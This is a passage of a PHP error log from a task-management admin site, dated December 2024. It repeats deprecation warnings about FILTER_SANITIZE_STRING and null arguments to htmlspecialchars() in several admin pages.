FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:33:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:37:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:37:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:38:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:38:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:39:29 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 09:39:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Dec-2024 09:40:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:40:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 09:49:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:49:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 09:49:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:49:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:37:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Dec-2024 21:37:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 21:37:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:38:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 21:38:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:39:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 21:39:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:09:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 09:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 